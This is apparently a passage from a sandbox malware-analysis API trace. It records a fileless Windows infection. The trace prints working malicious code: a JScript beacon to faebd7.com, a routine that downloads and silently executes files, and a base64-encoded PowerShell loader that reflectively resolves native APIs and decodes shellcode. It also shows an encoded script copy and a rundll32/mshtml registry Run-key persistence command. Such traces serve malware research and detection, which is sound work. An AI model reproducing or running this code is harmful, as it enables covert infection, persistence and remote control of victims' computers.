UHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBU", cchIn=0x7791, pchOut=0x0, cchOut=0x0, pcchRet=0x18ed0c*=0x0 | out: pchOut=0x0, pcchRet=0x18ed0c*=0x77a9) returned 0x8007007a [0036.232] IActiveScriptEncode:EncodeSection (in: This=0x74f6bc, pchIn="function log(l){try{x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://faebd7.com/log?log=\"+l,false);x.send();return 1;}catch(e){return 0;}}e=123;a=new ActiveXObject(\"WScript.Shell\");while(e!=42){try{w=a.ExpandEnvironmentStrings(\"%windir%\");p=w+\"\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe\";f=new ActiveXObject(\"Scripting.FileSystemObject\");function cdn(){try{return a.RegRead(\"HKLM\\\\software\\\\microsoft\\\\net framework setup\\\\ndp\\\\v2.0.50727\\\\sp\");}catch(e){return 0;}}function d(u){x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",u,false);x.send();ufn=a.ExpandEnvironmentStrings(\"%temp%\\\\\")+u.substring(u.lastIndexOf(\"/\")+1);ufnt=ufn+\".tmp\";uft=f.CreateTextFile(ufnt,true,-1);if(uft){uft.Write(x.responseBody);uft.Close();uf=f.CreateTextFile(ufn,true);uft=f.GetFile(ufnt);ufs=uft.OpenAsTextStream();ufs.Read(2);uf.Write(ufs.Read(uft.Size-2));ufs.Close();uf.Close();f.DeleteFile(ufnt);a.Run(\"\\\"\"+ufn+\"\\\" /quiet /norestart\",0,1);f.DeleteFile(ufn);}}while(!f.FileExists(p)){if(cdn()==0){d(\"\");}d(\"\");}(a.Environment(\"Process\"))(\"a\")=\"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBU", cchIn=0x7791, pchOut="皠O", cchOut=0x77aa, pcchRet=0x18ed0c*=0x77aa | out: pchOut="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", pcchRet=0x18ed0c*=0x77a9) returned 0x0 [0036.233] IUnknown:Release (This=0x74f6bc) returned 0x0 [0036.234] NtSetValueKey (in: KeyHandle=0x234, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0036.234] RegSetValueExW (in: hKey=0x234, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ 